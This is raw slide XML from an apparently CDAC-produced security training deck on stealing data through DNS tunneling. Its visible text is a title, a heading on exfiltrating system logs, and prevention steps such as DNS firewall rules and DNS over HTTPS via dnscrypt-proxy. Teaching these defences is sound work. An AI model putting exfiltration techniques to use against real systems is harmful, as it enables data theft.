              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{78C38012-EF5B-475C-A3D1-2E4681435FEC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B465E7C-9F8F-3415-8B94-C02C127949A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>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2022                                   Designed and Developed by CDAC </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BC088A-B368-4FD2-ACFA-77AD57548B70}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{78C38012-EF5B-475C-A3D1-2E4681435FEC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09925C84-B852-AB20-211E-FD02D58BAD85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>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2022                                   Designed and Developed by CDAC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19746-E801-4E54-AC0D-E9D5FAC639A0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>
            <a:ext cx="3860800" cy="365126"/>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t>Copyright © 2022                                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designed and Developed by CDAC </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38012-EF5B-475C-A3D1-2E4681435FEC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F560A6EE-0F9E-88AD-7688-7EF8FA890DE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="590550"/>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060"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cyber Gyan</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>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DD69C969-2390-16D3-DC1C-36C58C3E747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5496" y="39746"/>
            <a:ext cx="610470" cy="51105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6A4E78A-A5F6-40B6-BE69-33723C03B8F7}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024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Copyright © 2022                                   Designed and Developed by CDAC </a:t>
            </a:r>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D7F4AEAE-183F-4396-A09F-3B49F51A8D17}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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4267" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>System Administration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4267" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4267" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>with Windows  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60669036-D567-55E9-689F-C82E0EDCC4AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="1128154"/>
          </a:xfrm>
          <a:prstGeom prst="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7E9B11A0-E371-69D0-0C59-0A86310C63E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589304" y="0"/>
            <a:ext cx="1602696" cy="1128155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId13"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="575753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F29E0C-CF59-6201-ADFA-A0225B059D37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright © 2024                                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Designed and Developed by CDAC </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle: Rounded Corners 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9478A8F5-4876-4E36-4E58-9FD5A2ED4AAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1832611" y="2783178"/>
            <a:ext cx="8526778" cy="1291644"/>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060"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Data Stealing using DNS Tunneling</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99960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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="4000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="750" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="375"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453FEB-425B-488C-6F54-65B10B6676F9}"/>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7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{004C485B-F64F-4F33-F84D-414997E0A82A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="49780" t="7213"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2042053" y="1516142"/>
            <a:ext cx="8107893" cy="4211786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7988A896-B467-1006-E0DA-A73057BD397C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7669609" y="4653136"/>
            <a:ext cx="713581" cy="216024"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 116304"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFC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9240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B6201F3-07F8-FC10-F911-24DCD7943B3B}"/>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6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5156A41B-A821-51EA-2D34-FA70FE3BD298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="11645" r="52522" b="5206"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2578208" y="1626766"/>
            <a:ext cx="7035584" cy="4001726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E44779A2-5E69-F2C0-4733-3AC3C6A42F96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6888088" y="4653136"/>
            <a:ext cx="864096" cy="216024"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 116304"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFC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CC2B4885-3F77-7D7D-5C97-CB535DF7FF22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575720" y="836712"/>
            <a:ext cx="6112042" cy="496931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Method 3: Exfiltrating System Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245251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171DAF1-E505-6424-7439-EE59ECB1B790}"/>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7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62261184-FC1E-3091-1055-51AD21DD963F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="50083" t="6450" b="5042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2214971" y="1367923"/>
            <a:ext cx="7762058" cy="4122154"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31089147-475E-02AF-55D1-D305B2AA132B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8079874" y="4437112"/>
            <a:ext cx="679450" cy="146050"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 116304"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFC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28501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7F7C-9D89-D7C2-AD18-B61B43AF7FE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="653354"/>
            <a:ext cx="10972800" cy="685802"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PREVENTION FROM THE ATTACK:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF810876-B118-3B79-469D-2A837E6507CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150133" y="1398388"/>
            <a:ext cx="4385580" cy="555093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Implement DNS Firewall Rules</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" kern="1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lgn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000"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id="{1B29A83C-18F1-1F1B-9BC7-FD1BD72E6AF9}"/>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5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E087DE59-3ED0-1DAD-1C0C-6C50325122F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="23764" b="30510"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="983432" y="1925600"/>
            <a:ext cx="5650169" cy="1952602"/>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9903E442-9E8D-97F6-350E-21683C048D9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8663" b="4416"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7364512" y="1756647"/>
            <a:ext cx="3988072" cy="2658714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7AF3635-C336-F7C6-35E2-A07C001BBD79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect r="30438" b="7678"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7364512" y="4568490"/>
            <a:ext cx="3988072" cy="1634732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A600F4EE-EB83-5D8B-1D56-24A1EE7164B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="13275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="983431" y="4137033"/>
            <a:ext cx="5650168" cy="2067613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323538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46DA2-E967-0A1D-5971-C35E73BAEA0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1199456" y="782124"/>
            <a:ext cx="7128792" cy="606981"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>B. Implement DNS over HTTPS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DoH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>) using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-proxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
